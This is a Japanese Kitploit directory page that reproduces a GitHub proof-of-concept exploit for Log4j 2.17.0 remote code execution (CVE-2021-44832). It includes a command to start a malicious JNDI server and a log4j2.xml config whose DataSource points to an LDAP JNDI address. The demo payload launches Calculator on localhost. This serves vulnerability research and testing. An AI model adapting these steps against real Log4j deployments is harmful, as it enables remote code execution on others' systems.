Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4j_RCE_CVE-2021-44832 — Log4j 2.17.0 の RCE (CVE-2021-44832) に対する概念実証エクスプロイト。悪意のある設定ファイルの展開による JNDI インジェクションを利用。 | Kitploit
ツール/GitHubGitHub/cckuailong/log4j_rce_cve-2021-44832
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールリモートアクセスツール
GitHubcckuailong/log4j_rce_cve-2021-44832

log4j_RCE_CVE-2021-44832

Log4j 2.17.0 の RCE (CVE-2021-44832) に対する概念実証エクスプロイト。悪意のある設定ファイルの展開による JNDI インジェクションを利用。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
4114年前未レビュー

Log4j 2.17.0 RCE -- CVE-2021-44832

再現

  1. 悪意のあるjndiサーバーを起動する
root@kitploit:~
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"

  1. config/log4j2.xmlのDataSource部分を、生成したjndiアドレスに変更する
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="error">
    <Appenders>
        <JDBC name="databaseAppender" tableName="dbo.application_log">
            <DataSource jndiName="ldap://127.0.0.1:1389/nvrcl6" />
            <Column name="eventDate" isEventTimestamp="true" />
            <Column name="level" pattern="%level" />
            <Column name="logger" pattern="%logger" />
            <Column name="message" pattern="%message" />
            <Column name="exception" pattern="%ex{full}" />
        </JDBC>
    </Appenders>
    <Loggers>
        <Root level="warn">
            <AppenderRef ref="databaseAppender"/>
        </Root>
    </Loggers>
</Configuration>

設定ファイルを自分のHTTPサーバーにデプロイする

  1. PoCを修正する

HTTPサーバーにデプロイした設定ファイルに変更する

  1. 実行する

Log4shell Topic

https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j

reapocへの貢献を歓迎します

https://github.com/cckuailong/reapoc

ツールをダウンロード